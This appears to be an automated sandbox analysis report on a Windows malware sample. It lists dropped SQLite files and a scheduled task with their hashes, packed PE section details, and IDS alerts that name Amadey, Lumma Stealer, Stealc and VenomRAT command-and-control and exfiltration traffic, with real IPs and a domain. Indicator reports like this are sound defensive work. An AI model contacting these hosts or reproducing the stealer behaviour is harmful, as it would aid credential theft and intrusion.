Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpACE4.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpAD04.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB013.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB081.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB082.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB110.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB130.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB22B.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB2F7.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB3A4.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\MyData\DataLogs.conf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	8
Entropy (8bit):	2.75
Encrypted:	false
SSDEEP:	3:Rt:v
MD5:	CF759E4C5F14FE3EEC41B87ED756CEA8
SHA1:	C27C796BB3C2FAC929359563676F4BA1FFADA1F5
SHA-256:	C9F9F193409217F73CC976AD078C6F8BF65D3AABCF5FAD3E5A47536D47AA6761
SHA-512:	C7F832AEE13A5EB36D145F35D4464374A9E12FA2017F3C2257442D67483B35A55ECCAE7F7729243350125B37033E075EFBC2303839FD86B81B9B4DCA3626953B
Malicious:	false
Preview:	.5.False

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	290
Entropy (8bit):	3.3960006064573562
Encrypted:	false
SSDEEP:	6:9j9hVX55ZsUEZ+lX1CGdKUe6tFXqYEp5t/uy0lmQdt0:9NuQ1CGAFifXVzdt0
MD5:	E4F2128E5943E0F18E6DBFE219CE2626
SHA1:	61DE26A2C3AF378338F2AD4EB180FBA2EDADD3BE
SHA-256:	4C405F73CF308916D2AA093B634103F811F6277999079030AC230D87727D6795
SHA-512:	2C040B9059A2BE41A52CF21F7F3DC7567A592D76C930EC471102DF6434CC01DEBE8830EDECA6B84BE4B993026C2BDB1CE2B661D2F6100FF4A049A06DB4D1F8DF
Malicious:	false
Preview:	.....o...4cF....;g.F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0...................@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.686030927051206
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	3'238'912 bytes
MD5:	9aba31b7a6b0d1afa4b290557ad5b6fb
SHA1:	09d2f60eef3abb4c20394fd8369b32846456c533
SHA256:	9b1fad1eb049d54f44103ba67be774b96d2cfd82eeb5ec72aadd20ec29d846f8
SHA512:	a6df82bd55a8a45f5057fdc4ee9249fd11120854037157f5202ea282205798b309eb513ea62cec2de3e67ba2b7e64cbb3a852e3b57ddf361288c0843b039634f
SSDEEP:	98304:/JKXSj40TA0DywZAoxOYTdrylkhN/qeo:/JKX2/du6hQ
TLSH:	3CE55C91754971CFE7AA1E744617CD82995D03BA472088DBBC2D6CBABD63CC123F6C28
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x717000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F0084B68FFAh
cmovp esi, dword ptr [ecx]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [0000000Ah], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+00000000h], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [0000000Ah], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x388	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x315e84	0x10	lstatpgb
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x315e34	0x18	lstatpgb
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x68000	43953d69af2526d09233be9b568bb8a5	False	0.5592862642728366	data	7.07067899926297	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x388	0x400	514f5782f497fa171df6168314823de0	False	0.453125	data	5.340697973950139	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
lstatpgb	0x6b000	0x2ab000	0x2ab000	b06ceccd8f9e64f2c220e24d215d682f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
iqsxvwjg	0x316000	0x1000	0x400	cfab6698a99a6f9c20163953f0ea1134	False	0.8076171875	data	6.256434959854199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x317000	0x3000	0x2200	2ae8eece0fbda32c6718450c69e2c1ca	False	0.05859375	DOS executable (COM)	0.795471599568762	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x69070	0x198	ASCII text, with CRLF line terminators			0.5808823529411765
RT_MANIFEST	0x69208	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-10T11:11:04.935438+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.5	49816	185.215.113.43	80	TCP
2024-12-10T11:11:09.373369+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49828	31.41.244.11	80	TCP
2024-12-10T11:11:14.796729+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.5	49827	TCP
2024-12-10T11:11:16.133320+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49849	185.215.113.43	80	TCP
2024-12-10T11:11:17.627523+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49850	185.215.113.16	80	TCP
2024-12-10T11:11:18.455224+0100	2842478	ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)	1	205.209.109.10	4449	192.168.2.5	49856	TCP
2024-12-10T11:11:18.455224+0100	2052265	ET MALWARE Observed Malicious SSL Cert (VenomRAT)	1	205.209.109.10	4449	192.168.2.5	49856	TCP
2024-12-10T11:11:18.455224+0100	2052267	ET MALWARE Observed Malicious SSL Cert (VenomRAT)	1	205.209.109.10	4449	192.168.2.5	49856	TCP
2024-12-10T11:11:22.635229+0100	2057921	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz)	1	192.168.2.5	50255	1.1.1.1	53	UDP
2024-12-10T11:11:24.183678+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49867	104.21.32.1	443	TCP
2024-12-10T11:11:24.183678+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49867	104.21.32.1	443	TCP
2024-12-10T11:11:24.456515+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49868	185.215.113.43	80	TCP
2024-12-10T11:11:24.458505+0100	2842478	ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)	1	205.209.109.10	4449	192.168.2.5	49869	TCP
2024-12-10T11:11:24.531434+0100	2842478	ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)	1	205.209.109.10	4449	192.168.2.5	49870	TCP
2024-12-10T11:11:24.540120+0100	2842478	ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)	1	205.209.109.10	4449	192.168.2.5	49871	TCP
2024-12-10T11:11:24.553433+0100	2842478	ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)	1	205.209.109.10	4449	192.168.2.5	49872	TCP
2024-12-10T11:11:24.987762+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49867	104.21.32.1	443	TCP
2024-12-10T11:11:24.987762+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49867	104.21.32.1	443	TCP
2024-12-10T11:11:25.593249+0100	2842478	ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)	1	205.209.109.10	4449	192.168.2.5	49878	TCP
2024-12-10T11:11:25.612537+0100	2842478	ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)	1	205.209.109.10	4449	192.168.2.5	49879	TCP
2024-12-10T11:11:26.279727+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49880	185.215.113.16	80	TCP
2024-12-10T11:11:26.639127+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49881	104.21.32.1	443	TCP
2024-12-10T11:11:26.639127+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49881	104.21.32.1	443	TCP
2024-12-10T11:11:26.928950+0100	2842478	ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)	1	205.209.109.10	4449	192.168.2.5	49882	TCP
2024-12-10T11:11:28.036916+0100	2842478	ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)	1	205.209.109.10	4449	192.168.2.5	49890	TCP
2024-12-10T11:11:28.705077+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49881	104.21.32.1	443	TCP
2024-12-10T11:11:28.705077+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49881	104.21.32.1	443	TCP
2024-12-10T11:11:34.430634+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49906	185.215.113.43	80	TCP
2024-12-10T11:11:34.831663+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49912	104.21.32.1	443	TCP
2024-12-10T11:11:34.831663+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49912	104.21.32.1	443	TCP
2024-12-10T11:11:35.887902+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49914	185.215.113.16	80	TCP
2024-12-10T11:11:36.621191+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49912	104.21.32.1	443	TCP
2024-12-10T11:11:38.910797+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	49920	185.215.113.206	80	TCP
2024-12-10T11:11:39.489940+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49927	104.21.32.1	443	TCP
2024-12-10T11:11:39.489940+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49927	104.21.32.1	443	TCP
2024-12-10T11:11:42.054488+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49933	185.215.113.43	80	TCP
2024-12-10T11:11:43.194124+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49935	104.21.32.1	443	TCP
2024-12-10T11:11:43.194124+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49935	104.21.32.1	443	TCP
2024-12-10T11:11:43.372106+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49938	104.21.32.1	443	TCP
2024-12-10T11:11:43.372106+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49938	104.21.32.1	443	TCP
2024-12-10T11:11:43.519414+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49937	185.215.113.16	80	TCP
2024-12-10T11:11:44.743932+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49935	104.21.32.1	443	TCP
2024-12-10T11:11:44.743932+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49935	104.21.32.1	443	TCP
2024-12-10T11:11:46.167014+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49948	104.21.32.1	443	TCP
2024-12-10T11:11:46.167014+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49948	104.21.32.1	443	TCP
2024-12-10T11:11:46.877765+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49950	104.21.32.1	443	TCP
2024-12-10T11:11:46.877765+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49950	104.21.32.1	443	TCP
2024-12-10T11:11:47.387250+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49948	104.21.32.1	443	TCP
2024-12-10T11:11:47.387250+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49948	104.21.32.1	443	TCP
2024-12-10T11:11:52.205660+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	49984	185.215.113.206	80	TCP
2024-12-10T11:11:52.280070+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49987	104.21.32.1	443	TCP
2024-12-10T11:11:52.280070+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49987	104.21.32.1	443	TCP
